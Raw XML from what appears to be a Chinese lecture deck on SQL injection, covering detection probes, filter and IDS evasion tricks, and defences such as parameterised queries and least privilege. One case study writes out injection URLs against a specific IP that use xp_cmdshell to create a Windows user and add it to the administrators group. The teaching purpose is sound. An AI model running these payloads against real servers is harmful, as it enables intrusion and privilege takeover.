              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>链接中加入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>”and 1 =1”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>后的返回结果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注入：案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="图像 3副本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1" y="2386011"/>
            <a:ext cx="641985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63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30238" y="1382713"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>判断注入权限是否是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>sysadmin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注入语句为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>and 1=(select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>is_srvrolemember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sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>'))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注入：案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="图像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2976562"/>
            <a:ext cx="6886575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1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61975" y="1101725"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>下面的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中包含的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>语句用来增加一个名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>用户（口令也为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>）。返回结果如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>10-6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>所示。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://26.28.249.154/asd/wyqy/shownews.asp?id=51;exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 'net user test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> /add'--</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean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注入：案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="图像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286" y="3395564"/>
            <a:ext cx="683895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9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6242" y="1213325"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>下面，将增加的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>用户加入到管理员组。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链接为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>http://26.28.249.154/asd/wyqy/shownews.asp?id=51;exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 'net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t> administrators test /add'--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，返回结果如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>10-7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>所示。从图中可以看出，页面正常返回，说明添加成功。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注入：案例</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="图像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673" y="4130037"/>
            <a:ext cx="6967538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64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7763D57-5C31-4D64-BB6B-8AE95F99B80D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323587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简单模式匹配技术的缺点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62157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目前大多数实用的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>采用的主要是字符串匹配技术，根据专家的经验，提取关键字以及根据协议头的某些特点组成一个规则库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Alert tcp any any -&gt;$HOME_NET 80 ( msg:”phf cgi access attemp”; content : “/cgi-bin/phf”; flgs:PA;)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根据用户提交的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>请求中是否出现关键字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如果改为“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>/cgi-%62in/ph/%66”,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" smtClean="0"/>
              <a:t>不能够进行一些常见的解码工作就很容易被攻击者欺骗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45789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9613" y="1101725"/>
            <a:ext cx="7772400" cy="4608512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>一般来说，只要是带有参数的动态网页且此网页访问了数据库，那么该页面就有可能存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>注入漏洞。如果程序员安全意识不强，没有过滤输入的一些特殊字符，则存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>注入的可能性就非常大。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>在探测过程中，需要分析服务器返回的详细错误信息。而在默认情况下，浏览器仅显示“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTTP 500</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>服务器错误”，并不显示详细的错误信息。为此，需要调整</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>浏览器的配置，即把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>IE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>菜单【工具】中【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Internet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>选项】下的高级选项中的【显示友好</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>错误信息】前面的勾去掉。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注入：检测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4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038" y="1354137"/>
            <a:ext cx="7772400" cy="4579937"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>在形如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>http://xxx.xxx.xxx/abc.asp?id=XX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>的带有参数的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>动态网页中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>XX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>为参数。参数的个数和类型取决于具体的应用。参数的类型可以是整型或者字符串型。下面我们以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>http://xxx.xxx.xxx/abc.asp?id=YY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>为例进行分析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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>、整型参数时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>注入漏洞探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>、字符串型参数时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>注入漏洞探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>、特殊情况的处理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注入：检测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63613" y="1101725"/>
            <a:ext cx="7772400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400" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>、整型参数时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>注入漏洞探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>通常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>abc.asp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大致为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Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>表名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=YY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链接中附加一个单引号，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://xxx.xxx.xxx/abc.asp?id=YY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ’，运行异常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链接中附加一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and 1=1 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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://xxx.xxx.xxx/abc.asp?id=YY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  and 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>运行正常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链接中附加一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and 1=2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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://xxx.xxx.xxx/abc.asp?id=YY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  and 1=2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>运行异常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http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" smtClean="0"/>
              <a:t>xxx.xxx.xxx/abc.asp?id=YY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29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0733" y="1101725"/>
            <a:ext cx="7789862" cy="439896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400" dirty="0" smtClean="0"/>
              <a:t>2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字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>参数时的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>注入漏洞探测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>通常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>abc.asp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大致为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Select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>表名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>字段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YY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>’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链接中附加一个单引号，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://xxx.xxx.xxx/abc.asp?id=YY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ’，运行异常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链接中附加一个‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and 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 1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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://xxx.xxx.xxx/abc.asp?id=YY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and 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 1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运行正常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链接中附加一个‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and 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 1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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://xxx.xxx.xxx/abc.asp?id=YY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and 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 1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运行异常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http://xxx.xxx.xxx/abc.asp?id=YY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44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400" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>、特殊情况的处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>大小写混合法。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>VBS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>不区分大小写，程序员通常全部过滤大写或小写，忽视混写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UNICODE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ASSII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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>字符串长度验证，仅接受指定长度范围内的变量值。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>注入脚本必然会大大增加输入变量的长度，通过长度限制，比如用户名长度为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>20 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>个字符之间，超过就判定为无效值。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b="0" dirty="0" smtClean="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>对单引号和双</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>“-”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>、下划线、百分号等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>注释符号进行转义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b="0" dirty="0" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>对接收的参数进行类型格式化，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>参数值获取后，进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0" smtClean="0"/>
              <a:t>类型转换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注入漏洞的防护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8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dirty="0" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>永远不要使用动态拼装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>，推荐使用参数化的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>或者直接使用存储过程进行数据查询存取。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>注入最主要的攻击对象就是动态拼装的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>，通过参数化查询可以极大减少</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>注入的风险。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b="0" dirty="0" smtClean="0"/>
              <a:t>5. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>永远不要使用管理员权限的数据库连接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sa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root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admin)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>，为每个应用使用单独的专用的低特权账户进行有限的数据库连接。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b="0" dirty="0" smtClean="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>不要把机密信息明文存放，请加密或者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
              <a:t>掉密码和敏感的信息。这样对方就算获取到整个表的数据内容，也没什么价值。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注入漏洞的防护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4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2000" b="0" dirty="0" smtClean="0"/>
              <a:t>7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="0" dirty="0" smtClean="0"/>
